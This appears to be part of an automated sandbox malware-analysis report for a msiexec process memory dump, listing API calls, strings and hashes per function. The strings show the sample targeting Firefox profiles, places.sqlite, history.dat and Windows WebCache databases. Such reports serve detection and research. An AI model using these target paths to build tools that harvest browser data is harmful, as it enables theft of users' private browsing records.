                                                                        • Part of subcall function 00414C2E: wcscpy.MSVCRT ref: 00414CFC
                                                                        • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                        • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                        • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                        • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                        • Part of subcall function 0040414F: memset.MSVCRT ref: 00404172
                                                                        • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041D6
                                                                        • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041E7
                                                                        • Part of subcall function 0040414F: memset.MSVCRT ref: 00404200
                                                                        • Part of subcall function 0040414F: memset.MSVCRT ref: 00404215
                                                                        • Part of subcall function 0040414F: _snwprintf.MSVCRT ref: 0040422F
                                                                        • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 00404242
                                                                      • memset.MSVCRT ref: 004040FC
                                                                        • Part of subcall function 004099C6: wcslen.MSVCRT ref: 004099CD
                                                                        • Part of subcall function 004099C6: memcpy.MSVCRT(?,?,00000104,?,0040BAA5,00445FAE), ref: 004099E3
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000009.00000002.2613397301.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
                                                                      Similarity
                                                                      • API ID: memset$wcscpy$wcslen$_snwprintfmemcpywcscat
                                                                      • String ID: Mozilla\Firefox$Mozilla\Firefox\Profiles
                                                                      • API String ID: 1829478387-3369679110
                                                                      • Opcode ID: e8b210b2701fced3ec1563677da70e7bdaed7d27e85ea88c95246b73557c45d8
                                                                      • Instruction ID: a33c26704871042caa7cb74448a1974e70df039046fe21947f04a6d8cbe9f93a
                                                                      • Opcode Fuzzy Hash: e8b210b2701fced3ec1563677da70e7bdaed7d27e85ea88c95246b73557c45d8
                                                                      • Instruction Fuzzy Hash: 354134B294012CBADB20EB56DC85ECF777CAF85314F1180A7B509B3181EA745B948F6A
                                                                      APIs
                                                                      • memcpy.MSVCRT(00000048,00451D40,0000002C,000003FF,00445FAE,?,00000000,?,0040B879), ref: 004444E3
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000009.00000002.2613397301.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
                                                                      Similarity
                                                                      • API ID: memcpy
                                                                      • String ID: BINARY$NOCASE$RTRIM$main$no such vfs: %s$temp
                                                                      • API String ID: 3510742995-2641926074
                                                                      • Opcode ID: 821e0fdd347fba4e0959882d1eed221cd0f9849de050a87fd0c537b7ccc40074
                                                                      • Instruction ID: 565814064bb2237b40e40c3ad6633df45ffc5137317807aec9a32ad89077b3bf
                                                                      • Opcode Fuzzy Hash: 821e0fdd347fba4e0959882d1eed221cd0f9849de050a87fd0c537b7ccc40074
                                                                      • Instruction Fuzzy Hash: BA7119B1600701BFE710AF16CC81B66B7A8BB85319F11452FF4189B742D7BDED908B99
                                                                      APIs
                                                                      • CreateFileW.KERNELBASE(?,-7FBE829D,00000003,00000000,?,?,00000000), ref: 00418457
                                                                      • GetLastError.KERNEL32 ref: 0041847E
                                                                      • free.MSVCRT ref: 0041848B
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000009.00000002.2613397301.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
                                                                      Similarity
                                                                      • API ID: CreateErrorFileLastfree
                                                                      • String ID: |A
                                                                      • API String ID: 981974120-1717621600
                                                                      • Opcode ID: b73738cfafb11dafaf653c45b8d30767a4f0487cb759c2014a2d8a4f30590433
                                                                      • Instruction ID: 73005d91fce95ddd83c4435d1527c7398ec28b7193468e33704956b81d718a95
                                                                      • Opcode Fuzzy Hash: b73738cfafb11dafaf653c45b8d30767a4f0487cb759c2014a2d8a4f30590433
                                                                      • Instruction Fuzzy Hash: 50412472508306AFD710CF25DC4179BBBE5FF84328F14492EF8A492290EB78D9448B96
                                                                      APIs
                                                                        • Part of subcall function 0040B633: free.MSVCRT ref: 0040B63A
                                                                        • Part of subcall function 0044553B: memset.MSVCRT ref: 004455C2
                                                                        • Part of subcall function 0044553B: wcsrchr.MSVCRT ref: 004455DA
                                                                      • memset.MSVCRT ref: 004033B7
                                                                      • memcpy.MSVCRT(?,00000000,0000121C), ref: 004033D0
                                                                      • wcscmp.MSVCRT ref: 004033FC
                                                                      • _wcsicmp.MSVCRT ref: 00403439
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000009.00000002.2613397301.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
                                                                      Similarity
                                                                      • API ID: memset$_wcsicmpfreememcpywcscmpwcsrchr
                                                                      • String ID: $0.@
                                                                      • API String ID: 2758756878-1896041820
                                                                      • Opcode ID: f66ff37cfebf4588bd42dffc34473b3fc2588101413319c72ad25ea5b69c0f44
                                                                      • Instruction ID: ab192eb15c9642abc1a13bae453f9d52c7669558764b377fc560e22e349fc473
                                                                      • Opcode Fuzzy Hash: f66ff37cfebf4588bd42dffc34473b3fc2588101413319c72ad25ea5b69c0f44
                                                                      • Instruction Fuzzy Hash: 6B414A71A0C3819BD770EF65C885A8BB7E8AF86314F004D2FE48C97681DB3899458B5B
                                                                      APIs
                                                                        • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                        • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                                                                        • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                        • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                        • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                                                                        • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                                                                      • GetProcAddress.KERNEL32(00000000,00000000), ref: 004449E7
                                                                      • GetProcAddress.KERNEL32(00000000,00000000), ref: 004449F8
                                                                      • GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A09
                                                                      • GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A1A
                                                                      • GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A2B
                                                                      • GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A3C
                                                                      • GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A4D
                                                                      Memory Dump Source
                                                                      • Source File: 00000009.00000002.2613397301.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
                                                                      Similarity
                                                                      • API ID: AddressProc$LibraryLoad$DirectorySystemmemsetwcscatwcscpy
                                                                      • String ID:
                                                                      • API String ID: 2941347001-0
                                                                      • Opcode ID: 887775328fc4d7656a99cf0210b1f43b8bf028f74b4fef276dc7ab680041333b
                                                                      • Instruction ID: 45112ec7679d7541be2eaee67b01953ccf91f0241e5cd71b41190719d78dca83
                                                                      • Opcode Fuzzy Hash: 887775328fc4d7656a99cf0210b1f43b8bf028f74b4fef276dc7ab680041333b
                                                                      • Instruction Fuzzy Hash: 2E115871840700EDEA207F72DD0FF2B7AA5EF40B14F10882EF555594E1EBB6A8119E9C
                                                                      APIs
                                                                      • memset.MSVCRT ref: 00403C09
                                                                      • memset.MSVCRT ref: 00403C1E
                                                                        • Part of subcall function 00409719: wcslen.MSVCRT ref: 0040971A
                                                                        • Part of subcall function 00409719: wcscat.MSVCRT ref: 00409732
                                                                      • wcscat.MSVCRT ref: 00403C47
                                                                        • Part of subcall function 00414C2E: memset.MSVCRT ref: 00414C87
                                                                        • Part of subcall function 00414C2E: wcscpy.MSVCRT ref: 00414CFC
                                                                      • wcscat.MSVCRT ref: 00403C70
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000009.00000002.2613397301.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
                                                                      Similarity
                                                                      • API ID: memsetwcscat$wcscpywcslen
                                                                      • String ID: Mozilla\Firefox\Profiles$Mozilla\Profiles
                                                                      • API String ID: 2489821370-1174173950
                                                                      • Opcode ID: 5af024c53119846c6cf23d5d39710aba0b9f01952ad673d04fbaa3fd9d46c714
                                                                      • Instruction ID: 5219a381a5be6f9fff484f4b9c8ff18b49dc44b18064e24db21ac924a7a96902
                                                                      • Opcode Fuzzy Hash: 5af024c53119846c6cf23d5d39710aba0b9f01952ad673d04fbaa3fd9d46c714
                                                                      • Instruction Fuzzy Hash: 4401A9B294032C76DB207B669C86ECF672C9F45358F01447FB504B7182D9785E844AA9
                                                                      APIs
                                                                      • memset.MSVCRT ref: 0040A824
                                                                      • GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                                                                      • wcscpy.MSVCRT ref: 0040A854
                                                                      • wcscat.MSVCRT ref: 0040A86A
                                                                      • LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                                                                      • LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                                                                      Memory Dump Source
                                                                      • Source File: 00000009.00000002.2613397301.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
                                                                      Similarity
                                                                      • API ID: LibraryLoad$DirectorySystemmemsetwcscatwcscpy
                                                                      • String ID:
                                                                      • API String ID: 669240632-0
                                                                      • Opcode ID: 82c8cf326d92d3b179650df20de3df9a559229a48382c0fcbe0adb46b34a8860
                                                                      • Instruction ID: 21688b76284891f368be2c5f4feed5723597baa153f24eadc702144372ba9d0b
                                                                      • Opcode Fuzzy Hash: 82c8cf326d92d3b179650df20de3df9a559229a48382c0fcbe0adb46b34a8860
                                                                      • Instruction Fuzzy Hash: A6F0A472D0022467DF207B65AC46B8A3B6CBF01754F008072F908B71D2EB789A55CFDA
                                                                      APIs
                                                                      • wcschr.MSVCRT ref: 00414458
                                                                      • _snwprintf.MSVCRT ref: 0041447D
                                                                      • WritePrivateProfileStringW.KERNEL32(?,?,?,?), ref: 0041449B
                                                                      • GetPrivateProfileStringW.KERNEL32(?,?,?,?,?,?), ref: 004144B3
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000009.00000002.2613397301.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
                                                                      Similarity
                                                                      • API ID: PrivateProfileString$Write_snwprintfwcschr
                                                                      • String ID: "%s"
                                                                      • API String ID: 1343145685-3297466227
                                                                      • Opcode ID: 946b4c1fd7f9a1c82d4bd3564eada2d63785a77446bf9af388738d4a416c1506
                                                                      • Instruction ID: 05c1b6e2b8d8aed92df8b5d38884bf02313f678dea9e3ece4dcd1a0b753c0483
                                                                      • Opcode Fuzzy Hash: 946b4c1fd7f9a1c82d4bd3564eada2d63785a77446bf9af388738d4a416c1506
                                                                      • Instruction Fuzzy Hash: 7201AD3240421ABBEF219F81DC09FDB3F6AFF09305F14806ABA08501A1D339C5A5EB58
                                                                      APIs
                                                                      • GetModuleHandleW.KERNEL32(kernel32.dll,?,00413EA2,?,?,?,?,?,00000000,?), ref: 00413CB5
                                                                      • GetProcAddress.KERNEL32(00000000,GetProcessTimes), ref: 00413CCF
                                                                      • GetProcessTimes.KERNELBASE(00000000,?,?,?,?,?,00413EA2,?,?,?,?,?,00000000,?), ref: 00413CF2
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000009.00000002.2613397301.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
                                                                      Similarity
                                                                      • API ID: AddressHandleModuleProcProcessTimes
                                                                      • String ID: GetProcessTimes$kernel32.dll
                                                                      • API String ID: 1714573020-3385500049
                                                                      • Opcode ID: 3d2a63fc8b7889f90c1cc675bbb66959c3424aca663c91e440c9d47c6094dacc
                                                                      • Instruction ID: 0a9fc9a7fb2a98cd878f934f387e3824ef844cc6c25aa3dbb33b58617c33e237
                                                                      • Opcode Fuzzy Hash: 3d2a63fc8b7889f90c1cc675bbb66959c3424aca663c91e440c9d47c6094dacc
                                                                      • Instruction Fuzzy Hash: F5F03036204309AFEF008FA6FD06B963BA8BB04742F044066FA0CD1561D7B5D6B0EF99
                                                                      APIs
                                                                      • memset.MSVCRT ref: 004087D6
                                                                        • Part of subcall function 0040A6E6: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,000003FF,000000FF,00000000,000003FF,00000000,00000000,0040B866,00445FAE,?,?,?,?,?,?), ref: 0040A6FF
                                                                        • Part of subcall function 004095D9: memset.MSVCRT ref: 004095FC
                                                                      • memset.MSVCRT ref: 00408828
                                                                      • memset.MSVCRT ref: 00408840
                                                                      • memset.MSVCRT ref: 00408858
                                                                      • memset.MSVCRT ref: 00408870
                                                                      • memset.MSVCRT ref: 00408888
                                                                        • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                        • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                        • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                        • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                        • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                                      Memory Dump Source
                                                                      • Source File: 00000009.00000002.2613397301.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
                                                                      Similarity
                                                                      • API ID: memset$wcslen$AttributesByteCharFileMultiWidewcscatwcscpy
                                                                      • String ID:
                                                                      • API String ID: 2911713577-0
                                                                      • Opcode ID: 01acc2a10158501d086df2ecf85720ba35c535a6b148720ad12018c66e71fd5d
                                                                      • Instruction ID: a7e5ca25de4111a2a05fe91eb9e7b9268c7acadad77a1a504b595fc773a76dc1
                                                                      • Opcode Fuzzy Hash: 01acc2a10158501d086df2ecf85720ba35c535a6b148720ad12018c66e71fd5d
                                                                      • Instruction Fuzzy Hash: BD5146B280011D7EEB50E751DC46EEF776CDF05318F0040BEB948B6182EA745F948BA9
                                                                      APIs
                                                                      • memcmp.MSVCRT(?,?,00000004,?,00000065,004381DF,00000065,00000000,00000007,?,00000000), ref: 0041F202
                                                                      • memcmp.MSVCRT(?,SQLite format 3,00000010,?,00000065,004381DF,00000065,00000000), ref: 0041F22D
                                                                      • memcmp.MSVCRT(?,@ ,00000003,?,?,00000065,004381DF,00000065,00000000), ref: 0041F299
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000009.00000002.2613397301.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
                                                                      Similarity
                                                                      • API ID: memcmp
                                                                      • String ID: @ $SQLite format 3
                                                                      • API String ID: 1475443563-3708268960
                                                                      • Opcode ID: 82854fe69cd6f085c01fb16587ca6c24c159481fbb1fdb23c3f30c43337b22d0
                                                                      • Instruction ID: a5e199d7c3355b23248e204991ed7883f9cb1cefd3641e4a8180bf992d12f390
                                                                      • Opcode Fuzzy Hash: 82854fe69cd6f085c01fb16587ca6c24c159481fbb1fdb23c3f30c43337b22d0
                                                                      • Instruction Fuzzy Hash: 9051C1719002199BDF10DFA9C4817DEB7F4AF44314F1541AAEC14EB246E778EA8ACB88
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000009.00000002.2613397301.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
                                                                      Similarity
                                                                      • API ID: _wcsicmpqsort
                                                                      • String ID: /nosort$/sort
                                                                      • API String ID: 1579243037-1578091866
                                                                      • Opcode ID: 82532bcf7625f57df0476c9ea77f38d24af0b860564a5aebd85b14b7cf50dee8
                                                                      • Instruction ID: 59a4a6edbc2c6816dd96362f3638b70d105e8990563e463c72bda517b6347aa4
                                                                      • Opcode Fuzzy Hash: 82532bcf7625f57df0476c9ea77f38d24af0b860564a5aebd85b14b7cf50dee8
                                                                      • Instruction Fuzzy Hash: C8213770700201AFD714FB36C880E96F3AAFF58314F11012EE61897692DB39BC918B4A
                                                                      APIs
                                                                      • memset.MSVCRT ref: 0040E60F
                                                                      • memset.MSVCRT ref: 0040E629
                                                                        • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                        • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                        • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                        • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                        • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                                      Strings
                                                                      • Microsoft\Windows\WebCache\WebCacheV24.dat, xrefs: 0040E66F
                                                                      • Microsoft\Windows\WebCache\WebCacheV01.dat, xrefs: 0040E647
                                                                      Memory Dump Source
                                                                      • Source File: 00000009.00000002.2613397301.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
                                                                      Similarity
                                                                      • API ID: memsetwcslen$AttributesFilewcscatwcscpy
                                                                      • String ID: Microsoft\Windows\WebCache\WebCacheV01.dat$Microsoft\Windows\WebCache\WebCacheV24.dat
                                                                      • API String ID: 3354267031-2114579845
                                                                      • Opcode ID: 74f633d4b8b79b581db03fb52a9a183d925aa75474fb6f674f7548ec87be104c
                                                                      • Instruction ID: 2f29c334d396001d9fe1cebc89c879271eb53039ccc8e03d5a3365d75131e7c5
                                                                      • Opcode Fuzzy Hash: 74f633d4b8b79b581db03fb52a9a183d925aa75474fb6f674f7548ec87be104c
                                                                      • Instruction Fuzzy Hash: 66118AB3D4012C66EB10E755EC85FDB73ACAF14319F1408B7B904F11C2E6B89F984998
                                                                      APIs
                                                                      Strings
                                                                      • only a single result allowed for a SELECT that is part of an expression, xrefs: 0043AAD3
                                                                      Memory Dump Source
                                                                      • Source File: 00000009.00000002.2613397301.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
                                                                      Similarity
                                                                      • API ID: memset
                                                                      • String ID: only a single result allowed for a SELECT that is part of an expression
                                                                      • API String ID: 2221118986-1725073988
                                                                      • Opcode ID: f2ccd9f22684a9d505166f2bd917588c88a2d89474e41d8808a21707a3bb0a12
                                                                      • Instruction ID: 0c5fbdb45af1b87466ede92b40025f4dfba1e1eb7e0419b48c64bc8603b8f36f
                                                                      • Opcode Fuzzy Hash: f2ccd9f22684a9d505166f2bd917588c88a2d89474e41d8808a21707a3bb0a12
                                                                      • Instruction Fuzzy Hash: 5D827A71608340AFD720DF15C881B1BBBE1FF88318F14491EFA9987262D779E954CB96
                                                                      APIs
                                                                        • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 004449E7
                                                                        • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 004449F8
                                                                        • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A09
                                                                        • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A1A
                                                                        • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A2B
                                                                        • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A3C
                                                                        • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A4D
                                                                      • memcmp.MSVCRT(?,0044EC68,00000010,?,00000000,?), ref: 00444BA5
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000009.00000002.2613397301.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
                                                                      Similarity
                                                                      • API ID: AddressProc$memcmp
                                                                      • String ID: $$8
                                                                      • API String ID: 2808797137-435121686
                                                                      • Opcode ID: e80885fdbb6a557c0c44277052daa68a3f3074bd67b4db13da85d3ecc8de475b
                                                                      • Instruction ID: 2c4e4273d6b09173b98ec99ba1a72f96ebc6587eba5c15334d9e54441f883a66
                                                                      • Opcode Fuzzy Hash: e80885fdbb6a557c0c44277052daa68a3f3074bd67b4db13da85d3ecc8de475b
                                                                      • Instruction Fuzzy Hash: 04314171A00209ABEB10DFA6CDC1BAEB7B9FF88314F11055AE515A3241D778ED048B69
                                                                      APIs
                                                                        • Part of subcall function 0040E01E: OpenProcess.KERNEL32(00000040,00000000,00000000,00000104,?,00000000,00000104,?,00000000,00000104,00000000), ref: 0040E093
                                                                        • Part of subcall function 0040E01E: GetCurrentProcess.KERNEL32(?,80000000,00000000,00000000), ref: 0040E0B2
                                                                        • Part of subcall function 0040E01E: DuplicateHandle.KERNELBASE(?,00000104,00000000), ref: 0040E0BF
                                                                        • Part of subcall function 0040E01E: GetFileSize.KERNEL32(?,00000000), ref: 0040E0D4
                                                                        • Part of subcall function 0040E01E: CreateFileMappingW.KERNELBASE(?,00000000,00000002,00000000,00000000,00000000), ref: 0040E0FE
                                                                        • Part of subcall function 0040E01E: MapViewOfFile.KERNELBASE(00000000,00000004,00000000,00000000,00000104), ref: 0040E113
                                                                        • Part of subcall function 0040E01E: WriteFile.KERNELBASE(00000000,00000000,00000104,0040E6A3,00000000), ref: 0040E12E
                                                                        • Part of subcall function 0040E01E: UnmapViewOfFile.KERNEL32(00000000), ref: 0040E135
                                                                        • Part of subcall function 0040E01E: CloseHandle.KERNELBASE(?), ref: 0040E13E
                                                                      • CloseHandle.KERNELBASE(000000FF,000000FF,00000000,?,0040E6A3,000000FF,?,00000104,00000000), ref: 0040E582
                                                                        • Part of subcall function 0040E2AB: memset.MSVCRT ref: 0040E380
                                                                        • Part of subcall function 0040E2AB: wcschr.MSVCRT ref: 0040E3B8
                                                                        • Part of subcall function 0040E2AB: memcpy.MSVCRT(?,-00000121,00000008,0044E518,00000000,00000000,75922EE0), ref: 0040E3EC
                                                                      • DeleteFileW.KERNELBASE(?,?,0040E6A3,000000FF,?,00000104,00000000), ref: 0040E5A3
                                                                      • CloseHandle.KERNEL32(000000FF,?,0040E6A3,000000FF,?,00000104,00000000), ref: 0040E5CA
                                                                        • Part of subcall function 0040E175: memset.MSVCRT ref: 0040E1BD
                                                                        • Part of subcall function 0040E175: _snwprintf.MSVCRT ref: 0040E257
                                                                        • Part of subcall function 0040E175: free.MSVCRT ref: 0040E28B
                                                                      Memory Dump Source
                                                                      • Source File: 00000009.00000002.2613397301.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
                                                                      Similarity
                                                                      • API ID: File$Handle$Close$ProcessViewmemset$CreateCurrentDeleteDuplicateMappingOpenSizeUnmapWrite_snwprintffreememcpywcschr
                                                                      • String ID:
                                                                      • API String ID: 1979745280-0
                                                                      • Opcode ID: 8c4b04af935ef543e183fc2d5fdeec50da417ae7152dfd79b37e36c3b45d6897
                                                                      • Instruction ID: 90d235a97b45fa8760f9e747b2c38a4e83ddeae1161d8ec943a7631d31c9d9e7
                                                                      • Opcode Fuzzy Hash: 8c4b04af935ef543e183fc2d5fdeec50da417ae7152dfd79b37e36c3b45d6897
                                                                      • Instruction Fuzzy Hash: DA312CB1C00618ABCF60DF96CD456CEF7B8AF44318F1006AB9518B31A1DB755E95CF58
                                                                      APIs
                                                                        • Part of subcall function 00414B81: GetProcAddress.KERNEL32(00000000,SHGetSpecialFolderPathW), ref: 00414BA4
                                                                      • memset.MSVCRT ref: 00414C87
                                                                      • wcscpy.MSVCRT ref: 00414CFC
                                                                        • Part of subcall function 00409CEA: GetVersionExW.KERNEL32(0045D340,0000001A,00414C4F,?,00000000), ref: 00409D04
                                                                      Strings
                                                                      • Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders, xrefs: 00414CA2, 00414CB2
                                                                      Memory Dump Source
                                                                      • Source File: 00000009.00000002.2613397301.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
                                                                      Similarity
                                                                      • API ID: AddressProcVersionmemsetwcscpy
                                                                      • String ID: Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
                                                                      • API String ID: 4182280571-2036018995
                                                                      • Opcode ID: e6b24c1e526a7e6b175339e46d2c1329f14507f19ad0c7641bd2f64e2867ccb0
                                                                      • Instruction ID: cfba8ba70a3d5c5eb0df7add68d4968905301debfffe1ddd107e81ced3c7690c
                                                                      • Opcode Fuzzy Hash: e6b24c1e526a7e6b175339e46d2c1329f14507f19ad0c7641bd2f64e2867ccb0
                                                                      • Instruction Fuzzy Hash: EE110B31802224ABDB24A7999C4E9EF736CDBD1315F2200A7F80562151F6685EC5C6DE
                                                                      APIs
                                                                        • Part of subcall function 00403BED: memset.MSVCRT ref: 00403C09
                                                                        • Part of subcall function 00403BED: memset.MSVCRT ref: 00403C1E
                                                                        • Part of subcall function 00403BED: wcscat.MSVCRT ref: 00403C47
                                                                        • Part of subcall function 00403BED: wcscat.MSVCRT ref: 00403C70
                                                                      • memset.MSVCRT ref: 00403A55
                                                                        • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                        • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                        • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                        • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                        • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                                        • Part of subcall function 0040A8D0: wcslen.MSVCRT ref: 0040A8E2
                                                                        • Part of subcall function 0040A8D0: free.MSVCRT ref: 0040A908
                                                                        • Part of subcall function 0040A8D0: free.MSVCRT ref: 0040A92B
                                                                        • Part of subcall function 0040A8D0: memcpy.MSVCRT(?,?,000000FF,00000000,?,?,00000000,?,0040320A,00000000,000000FF), ref: 0040A94F
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000009.00000002.2613397301.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
                                                                      Similarity
                                                                      • API ID: memsetwcscatwcslen$free$AttributesFilememcpywcscpy
                                                                      • String ID: history.dat$places.sqlite
                                                                      • API String ID: 2641622041-467022611
                                                                      • Opcode ID: ff38290cf6d73649d3c52fc0ad95bc2cdf601f157f84f60878f9098853983ee3
                                                                      • Instruction ID: 4d52d99a2018a06e8b3479be55870673e402391ac5db5fe9af26a684ed702786
                                                                      • Opcode Fuzzy Hash: ff38290cf6d73649d3c52fc0ad95bc2cdf601f157f84f60878f9098853983ee3
                                                                      • Instruction Fuzzy Hash: CA112EB2A0111866DB10FA66CD4AACE77BCAF54354F1001B7B915B20C2EB3CAF45CA69
                                                                      APIs
                                                                        • Part of subcall function 00417570: SetFilePointer.KERNELBASE(?,?,?,00000000), ref: 00417591
                                                                        • Part of subcall function 00417570: GetLastError.KERNEL32 ref: 004175A2
                                                                        • Part of subcall function 00417570: GetLastError.KERNEL32 ref: 004175A8
                                                                      • ReadFile.KERNELBASE(?,?,?,?,00000000), ref: 0041761D
                                                                      • GetLastError.KERNEL32 ref: 00417627
                                                                      Memory Dump Source
                                                                      • Source File: 00000009.00000002.2613397301.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
                                                                      Similarity
                                                                      • API ID: ErrorLast$File$PointerRead
                                                                      • String ID:
                                                                      • API String ID: 839530781-0
                                                                      • Opcode ID: 35ac1a26cfbf5729ffddcbfd3a0d39ca45c1cff254cac5b3720273d0b32ffa80
                                                                      • Instruction ID: c9208e3d43fc8ff2949f7201360c8f82def2114e122364bdeb0a9035ecfb973e
